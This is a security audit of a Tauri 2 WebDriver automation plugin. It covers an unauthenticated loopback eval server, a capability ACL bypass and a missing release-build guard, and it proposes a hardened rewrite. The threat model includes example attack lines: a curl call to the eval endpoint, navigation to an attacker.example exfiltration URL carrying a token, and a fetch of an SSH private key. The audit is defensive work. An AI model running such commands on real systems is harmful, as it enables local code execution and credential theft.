tauri-webdriver-automation (danielraffel) — Security Audit
What it is: Community Tauri 2 plugin that exposes a WebDriver-shaped HTTP server inside a debug-built Tauri app on macOS, plus a CLI (tauri-wd) that translates W3C WebDriver requests into the plugin’s protocol, plus an MCP server (mcp-tauri-automation) that lets agents drive the whole thing through a model.
Status: Live as of 2026-02. Small project (1 author, 16 stars, ~2 kLOC Rust, ~1.7 kLOC TS). Last commit on main: 2026-02-17.
Most relevant to Locara: It’s the only thing on the planet today that solves agent-driven Tauri testing on Apple Silicon — but it ships several patterns that conflict with Locara’s security stance. Audit verdict: re-implement, don’t vendor.
This note records the audit findings against the methodology. Audited commit: main HEAD as of 2026-05-07.
Plugin facts
| Field | Value |
|---|---|
| Repo | https://github.com/danielraffel/tauri-webdriver |
| License | MIT OR Apache-2.0 (vendor-OK) |
| LOC | plugin lib.rs 92 + server.rs 1804 + init.js ~135 ≈ 2030 LOC; CLI main.rs 1768 |
| Crate version | 0.1.3 |
| Last commit (main) | 2026-02-17 (≈2.5 months stale) |
| Open issues | 4 (incl. #4 — PoisonError self-termination on macOS) |
| Stars / forks | 16 / 2 |
| Plugin direct deps | axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2 (wry, dynamic-acl) |
| Bus factor | 1 (@danielraffel, AI-assisted per the README) |
| Companion MCP | danielraffel/mcp-tauri-automation — TS, MIT, fork of Radek44/mcp-tauri-automation, last push 2026-02-14 |
TL;DR
Re-implement, don’t vendor. Three load-bearing problems:
- The HTTP server is unauthenticated on a loopback TCP port — any local process gets RCE in the webview.
- The plugin bypasses the host app’s capability ACL by calling
app.add_capability(...)at runtime withwindow("*")+ remotehttp://*/https://*globs. - The “debug-only” promise is a README convention, not a code-level kill-switch — there’s no
#[cfg(not(debug_assertions))] compile_error!, so a release build accidentally including the dependency ships an open WebDriver server.
The agent-useful subset (click, type, eval, screenshot, invoke) is well under 500 LOC of axum + WebviewWindow::eval. Vendoring the upstream would inherit all three problems plus the v0.1.3 PoisonError reliability bug. We rebuild on Locara’s terms — Unix-socket transport, bearer-token auth, compile-time release-build guard, capability integration that respects the manifest, structured audit log.
Threat model — what an attacker can do
Against tauri-webdriver-automation running in a typical Tauri 2 dev environment:
Same-machine, different-process → Critical. Any local process running as the user (a malicious npm postinstall, a compromised VS Code extension, a Mac-malware sample) can curl -X POST http://127.0.0.1:<port>/script/execute -d '{"script":"...","args":[]}' and run arbitrary JS in your dev app’s webview. That JS can:
- Read DOM and exfil to the network (
fetch). - Call any Tauri command via
window.__TAURI_INTERNALS__.invoke— the plugin’s runtime ACL bypass meanswindow("*")is allowed, so even non-debug commands are reachable. - Read
file://URLs if the host app’sapp.security.assetProtocolallows it (default Tauri is restrictive but plugins commonly loosen this).
The port is broadcast on stdout (server.rs:1798 — println!("[webdriver] listening on port {}", port)); anything that captures the dev binary’s stdout (CI log uploads, screen-share, parent-process tee) leaks the port. Even without that leak, the loopback port range is ~64 k — scannable in seconds.
Same-LAN, browser tab → Probably blocked, but only by the browser. A page on a coffee-shop network can’t reach 127.0.0.1 directly, but DNS rebinding against localhost:<port> is a known bypass. The plugin sets no CORS headers and doesn’t validate Host or Origin. The plugin uses application/json POSTs which trigger preflight, and the missing Access-Control-Allow-Origin causes the preflight to fail in a normal browser — so a naive browser-tab attack fails, but it fails outside the plugin in CORS, not inside the plugin’s code. Native helpers, browser extensions with <all_urls> permission, and non-browser HTTP clients have no such mitigation.
Same-LAN, native client → No direct exposure. TcpListener::bind("127.0.0.1:0") doesn’t accept off-host connections.
Production-build accident → Critical. If a downstream user adds the crate to [dependencies] (not [target.'cfg(debug_assertions)'.dependencies]) and forgets the wrap in main.rs, the release build ships a fully open WebDriver server. There is no compile-time, no env-var, no runtime check inside the plugin to prevent this.
Findings
F1 — Loopback HTTP server is unauthenticated
server.rs:1795 — tokio::net::TcpListener::bind("127.0.0.1:0"). No bearer token, no shared secret, no Unix-socket peer credentials, no Authorization header check, no rate limit. Routes are bare POST /script/execute, POST /navigate/url, POST /cookie/add, etc.
Attacker class: same-machine.
Severity: Critical.
Mitigation if vendoring: require an Authorization: Bearer <token> header with a 32-byte random token generated at boot, written to a 0600-mode file in $XDG_RUNTIME_DIR. Better: drop TCP entirely, switch to a Unix domain socket with peer-credential check (SO_PEERCRED on Linux, LOCAL_PEERCRED on macOS).
F2 — #[cfg(debug_assertions)] is a README convention, not enforced in code
lib.rs::init() has zero cfg gates. The plugin will happily start the server in a release binary. The protection — wrapping app.plugin(tauri_plugin_webdriver_automation::init())? in #[cfg(debug_assertions)] — has to happen at the call site, in the consumer’s main.rs, where it is one missed wrap away from shipping.
Attacker class: production-build accident. Severity: Critical. Mitigation if re-implementing:
// crates/locara-automation/src/lib.rs (top of file)
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds. \
Gate the dependency in Cargo.toml under \
[target.'cfg(debug_assertions)'.dependencies] or enable the \
explicit `force-enable-automation` feature flag.");
Plus a runtime check on LOCARA_AUTOMATION=1. If unset, the plugin’s init() returns success but never opens the surface. Defense in depth: the build fails and the runtime refuses to start.
F3 — Plugin self-grants a permissive capability that overrides tauri.conf.json
lib.rs:60-66:
app.add_capability(
tauri::ipc::CapabilityBuilder::new("webdriver-automation")
.local(true)
.window("*")
.remote("http://*".into())
.remote("https://*".into())
.permission("webdriver-automation:default"),
)?;
window("*") allows any window. The two remote("http://*") / remote("https://*") globs allow any http/https origin loaded into a webview to call plugin:webdriver-automation|resolve. The resolve callback is invoked from the plugin’s own injected init.js, not from remote pages, so the remote globs are gratuitous — they only expand the IPC attack surface.
Attacker class: any page loaded into the webview (in scope for apps that allow remote content).
Severity: High.
Mitigation if re-implementing: ship a permissions/automation.toml and require the host app to opt in via its own tauri.conf.json capability allowlist. Tighten window scope to a specific automation window label. Drop the .remote() globs entirely.
F4 — script_execute is a thin shell over webview eval
server.rs:755-765 — request body’s script is wrapped into (function(){ ... }).apply(null, __args) and passed straight to WebviewWindow::eval. No allowlist, no sandboxing, no audit log of what JS ran.
This is by design — it’s the agent surface — but combined with F1, anyone speaking to the loopback port can do anything the page can.
Attacker class: same-machine (gated by F1 if F1 is fixed). Severity: High (as a primitive). Acceptable if and only if F1 is mitigated and an audit log is added. Mitigation if re-implementing: keep the eval primitive (we need it), but wrap it in:
- bearer-token / unix-socket auth (closes F1),
- structured append-only audit log (timestamp, route, caller PID via
SO_PEERCRED, body hash, response shape), - compile-time release-build kill-switch (closes F2).
F5 — navigate_url accepts arbitrary URLs
server.rs:834+ — driver can drive the webview to any URL. Combined with F1, an attacker can pivot the webview to https://attacker.example/exfil?token=... carrying the user’s session.
Attacker class: same-machine.
Severity: Medium (high if combined with F1 unfixed).
Mitigation: allowlist the navigation targets to tauri://, data:, and explicitly-permitted origins.
F6 — fetch('file://...') gated only by WKWebView config
The plugin doesn’t tighten app.security.assetProtocol. If the host app loosens it for asset loading, the WebDriver caller can read arbitrary files via fetch('file:///Users/you/.ssh/id_rsa').
Attacker class: same-machine (same as F1).
Severity: High (in apps that allow file:); inert otherwise.
Mitigation if re-implementing: require strict assetProtocol and dangerousDisableAssetCspModification = false whenever automation is enabled; refuse to start otherwise.
F7 — expect/unwrap-heavy mutex locking
server.rs and lib.rs use .lock().expect("...") extensively (pending_scripts, frame_stack, current_window_label). Issue #4 confirms a PoisonError self-terminates tauri-wd on macOS in v0.1.3 after a few sequential tests.
Attacker class: none directly — but reliability bugs of this shape are the difference between “tests pass once then deadlock” and “tests are dependable.”
Severity: Medium (reliability).
Mitigation if re-implementing: RwLock over Mutex where possible, try_lock()-with-recovery on critical paths, structured panic-to-error conversion at task boundaries. Replace every .expect("lock poisoned") with let Ok(g) = m.lock() else { return ServerError::Poisoned; }.
F8 — Stdout port disclosure
server.rs:1798 — println!("[webdriver] listening on port {}", port);. Anything reading the binary’s stdout (CI log uploads, tee’d dev terminals, screen-share, parent-process capture) leaks the port. With F1 unfixed, this is a one-shot RCE for any process that captured a CI log.
Attacker class: same-machine + log-leak. Severity: Low alone, High when combined with F1. Mitigation if re-implementing: Unix socket eliminates the port. Token (if we still expose one) goes to a 0600-mode file readable only by the same UID, never to stdout.
F9 — tauri-wd CLI launches arbitrary binaries
main.rs:319 — tokio::process::Command::new(&binary) where binary comes from W3C session capabilities tauri:options.binary. Anyone speaking to the CLI on :4444 can execute any binary on disk.
Attacker class: same-machine (against the test runner, not the plugin). Severity: High if we ship the MCP companion. Inert if we don’t. Decision: don’t ship the MCP companion. Locara’s automation is wired directly into the locara CLI; we don’t need a separate WebDriver-shaped CLI.
F10 — Dependency surface is clean (positive finding)
axum 0.8, tokio 1, serde 1, serde_json 1, uuid 1, tracing 0.1, tauri 2. All actively maintained, no yanked versions, no open cargo audit advisories of note. No unsafe in plugin source. No supply-chain finding. The risk is in the plugin’s own design, not its deps.
What the plugin gets right (worth porting)
__WEBDRIVER__JS bridge pattern —js_init_scriptinjects a small client-side helper that exposeswindow.__WEBDRIVER__.resolve(id, value)→ atokio::sync::oneshoton the Rust side. Clean, low-overhead, parameter-safe (the script body is the only stringy bit). Rename to__LOCARA__for ours.pending_scripts: Mutex<HashMap<id, oneshot::Sender>>lifecycle — request comes in, generates UUID, writes to map, eval’s the script with the UUID, JS resolves with the UUID, Rust pulls the sender from the map and replies. Replaceexpect()with poisoned-recovery; otherwise port intact.on_webview_readybroadcast — start the automation server only after at least one webview exists, soevalalways has somewhere to land. Useful pattern.- Single-binary debug-only philosophy — the intent is right; we just enforce it in code instead of README.
Re-implementation sketch — crates/locara-automation
Target: <500 LOC Rust + ~80 LOC JS. Zero new top-level transitive crates beyond what Locara already pulls in (axum, tokio, serde, serde_json, tauri, uuid, tracing).
crates/locara-automation/
Cargo.toml # debug-only feature, version pinned to workspace
permissions/
automation.toml # opt-in capability, host-app declares
default.toml # the single permission `automation:resolve`
src/
lib.rs # plugin entry, compile-time guard, capability registration
server.rs # axum router on a Unix socket, ~250 LOC
auth.rs # bearer-token middleware, token file lifecycle
audit.rs # append-only JSONL log, ~80 LOC
init.js # __LOCARA__ bridge, mirror of init.js
Transport: tokio::net::UnixListener::bind("$XDG_RUNTIME_DIR/locara-automation-<pid>.sock") with 0o600. Closes F1, F8 in one move.
Auth: ephemeral 32-byte bearer token, written to $XDG_RUNTIME_DIR/locara-automation-<pid>.token mode 0o600. The Locara CLI reads the path from $XDG_RUNTIME_DIR (or from a structured handshake message on the socket itself), never from stdout.
Compile-time guard (F2):
#[cfg(not(any(debug_assertions, feature = "force-enable-automation")))]
compile_error!("locara-automation must not be linked into release builds");
Runtime guard: init() checks LOCARA_AUTOMATION=1; if unset, returns Ok without starting the server. The Locara CLI sets this when it spawns the dev shell.
Capability integration (F3): never call add_capability at runtime. Ship permissions/automation.toml; require the consumer to add automation:default to their own capability allowlist. Locara apps already have capability declarations in their manifests — this is the same path.
IPC shape (six routes, agent-useful subset):
POST /eval { window, script } → { value }
POST /click { window, selector, index } → { ok }
POST /type { window, selector, text } → { ok }
POST /screenshot { window } → { png_b64 }
POST /invoke { window, command, payload } → { value }
POST /navigate { window, url } → { ok }
That’s it. No frames, no shadow DOM, no cookies, no alerts. Add when an actual recipe needs it.
Lifecycle: start the server in setup() after on_webview_ready. Store the JoinHandle in plugin state. Abort on RunEvent::Exit. Refuse to start if a sibling locara-automation-*.sock already exists for the same UID + bundle ID (prevents accidental double-launch attacks).
Audit log (mandatory): every request writes a line to ~/Library/Logs/Locara/automation-<date>.jsonl:
{"ts":"2026-05-07T19:14:22Z","route":"/eval","caller_pid":12345,"caller_uid":501,"body_sha256":"…","response_shape":"value","ms":14}
Append-only, log-rotated daily.
Mutex discipline (F7): RwLock for read-mostly state (the pending_scripts map). try_lock + structured error on contention. Every panic at a task boundary is converted to a 500 Internal Error in the response, never propagates.
Closes F4-F6, F8-F9 by construction: F4 (eval surface) is wrapped by F1+F2 mitigations and the audit log. F5 (navigate) is allowlisted. F6 (file://) is precondition-checked at startup. F8 (stdout) is gone — Unix socket. F9 (CLI binary launching) is out of scope — we don’t ship the WebDriver CLI.
Effort: 1-2 days of focused work for the plugin + a Bun runner that talks to the socket. Recipes from tools/probe-ui port nearly unchanged because they already use the Probe handle abstraction; a thin adapter from Probe → automation-socket replaces the Playwright bits.
Specific learnings for Locara
-
The fact that an unauthenticated, ACL-bypassing, README-gated WebDriver plugin is the best available option for agent-driven Tauri testing on macOS is itself a useful signal. The space is wide open. Locara should treat agent-driven E2E as a product feature, not a third-party dependency. Owning the surface is consistent with our security positioning and removes a long-term supply-chain risk.
-
Patterns to copy from upstream:
js_init_script+oneshot::channelresolve mechanism,on_webview_readybroadcast, request-id-routed scripts. These are well-shaped. -
Patterns to discard: TCP-bind, runtime
add_capability, README-onlycfggating, port disclosure on stdout,expect()-heavy mutex locking, MCP companion binary launcher. -
Defense in depth means three layers: (a) compile-time
compile_error!blocks release builds, (b) runtime env-var gate refuses to open the surface, (c) Unix socket + bearer token blocks anything that gets past (a) and (b). -
Audit logs aren’t optional for RCE-shape primitives. A surface that can
evalJS in a webview must have a structured, append-only, on-disk record of every call. The reason isn’t blame — it’s that when something goes wrong, you need the data. -
Re-implementation cost is small (~500 LOC). Less than the audit cost of vendoring upstream and maintaining a security-fixed fork over time. The decision is structural, not heroic.
-
tauri-driver(official) and CrabNebula’s@crabnebula/tauri-driverare also options — official is[Todo]on macOS so a non-starter today; CrabNebula is paywalled for macOS. Build our own. -
Update
notes/tauri.mdcross-reference when this lands: Locara’s testing primitive is a Tauri plugin, not a third-party tool. Same trust boundary.
References
- danielraffel/tauri-webdriver — the audited plugin.
lib.rs(head, 60-66 capability bypass)server.rs(head, 1795 bind / 755 eval shell)init.js(JS bridge pattern)- Issue #4 —
PoisonErrorreliability bug - Author’s background article
@danielraffel/mcp-tauri-automation— companion MCP server.- Tauri 2 security model — the trust boundary the plugin lives inside.
- Tauri 2 plugin development —
Builder,setup,invoke_handlerlifecycle for the re-implementation. - Tauri 2 WebDriver story (official) — confirms macOS gap.
- Tauri team discussion #3768 — Rust-side E2E patterns —
thirtyfour, mock IPC, macOS unsolved. notes/tauri-plugin-security-methodology.md— the audit checklist this note follows.